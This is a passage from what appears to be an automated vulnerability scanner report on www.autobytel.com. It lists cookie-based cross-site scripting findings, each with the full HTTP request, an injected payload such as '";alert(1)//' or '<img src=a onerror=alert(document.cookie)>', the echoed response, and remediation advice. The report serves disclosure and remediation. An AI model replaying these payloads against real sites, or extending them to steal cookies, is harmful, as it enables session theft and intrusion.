This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/article/index.cfm/filters/Auto%20Show HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=60be7"%3balert(1)//28645459fda; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:30:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:30:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:30:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:30:00 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53087


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "60be7";alert(1)//28645459fda||";
           
           s.prop14 = "research|article|autoshow : Search Engine Optimization Project entry page";
           s.prop15 = "6582|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||
...[SNIP]...

4.2057. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 11748<img%20src%3da%20onerror%3dalert(1)>74f3489293b was submitted in the PV_CT cookie. This input was echoed as 11748<img src=a onerror=alert(1)>74f3489293b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/article/index.cfm/filters/Auto%20Show HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=211748<img%20src%3da%20onerror%3dalert(1)>74f3489293b; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 60824
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:27:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:46 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:45 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:45 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 211748<img src=a onerror=alert(1)>74f3489293b cannot be converted to a number.
</h1>
...[SNIP]...

4.2058. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8fdd"%3balert(1)//5500969e7cb was submitted in the BDATALIST cookie. This input was echoed as e8fdd";alert(1)//5500969e7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4e8fdd"%3balert(1)//5500969e7cb; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:08 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45616


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4e8fdd";alert(1)//5500969e7cb";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "477ADD20-B13F-2799-135F8D39
...[SNIP]...

4.2059. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9f4a"%3balert(1)//984810f28b2 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as e9f4a";alert(1)//984810f28b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=e9f4a"%3balert(1)//984810f28b2; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:31:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:29 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45616


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "e9f4a";alert(1)//984810f28b2||";
           
           s.prop14 = "research|article|buyingguide : Search Engine Optimization Project entry page";
           s.prop15 = "8849|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research
...[SNIP]...

4.2060. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload a5fe8<img%20src%3da%20onerror%3dalert(1)>1080b64761a was submitted in the PV_CT cookie. This input was echoed as a5fe8<img src=a onerror=alert(1)>1080b64761a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2a5fe8<img%20src%3da%20onerror%3dalert(1)>1080b64761a; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 53354
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:27:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:27 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:27 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 2a5fe8<img src=a onerror=alert(1)>1080b64761a cannot be converted to a number.
</h1>
...[SNIP]...

4.2061. http://www.autobytel.com/content/research/comparison/index.cfm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/comparison/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac01"%3balert(1)//ab5c6eae5d1 was submitted in the BDATALIST cookie. This input was echoed as 5ac01";alert(1)//ab5c6eae5d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/comparison/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c45ac01"%3balert(1)//ab5c6eae5d1; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:20 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414164


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c45ac01";alert(1)//ab5c6eae5d1";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "477CAF5F-B294-6E91-C704E9E0
...[SNIP]...

4.2062. http://www.autobytel.com/content/research/comparison/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/comparison/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59b4c"%3balert(1)//6c656f1a1a5 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 59b4c";alert(1)//6c656f1a1a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/comparison/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=59b4c"%3balert(1)//6c656f1a1a5; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:44:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:44:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:13 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:13 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414164


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
Crossover/Wagons";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "59b4c";alert(1)//6c656f1a1a5||";
           
           s.prop14 = "research|comparison : Search Engine Optimization Project entry page";
           s.prop15 = "No Article|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||
...[SNIP]...

4.2063. http://www.autobytel.com/content/research/comparison/index.cfm [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/comparison/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 331ff<img%20src%3da%20onerror%3dalert(1)>6cc2970f544 was submitted in the PV_CT cookie. This input was echoed as 331ff<img src=a onerror=alert(1)>6cc2970f544 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/comparison/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2331ff<img%20src%3da%20onerror%3dalert(1)>6cc2970f544; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 421910
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:33:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:15 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:14 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:14 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 2331ff<img src=a onerror=alert(1)>6cc2970f544 cannot be converted to a number.
</h1>
...[SNIP]...

4.2064. http://www.autobytel.com/content/research/index.cfm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c114f"%3balert(1)//11f8a886fb2 was submitted in the BDATALIST cookie. This input was echoed as c114f";alert(1)//11f8a886fb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4c114f"%3balert(1)//11f8a886fb2; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:29:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:29:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:29:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:29:29 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104097


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4c114f";alert(1)//11f8a886fb2";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47996F58-AADD-8D97-48B2F1E9
...[SNIP]...

4.2065. http://www.autobytel.com/content/research/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86827"%3balert(1)//219d19e185b was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 86827";alert(1)//219d19e185b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/index.cfm HTTP/1.1
Host: www.autobytel.com
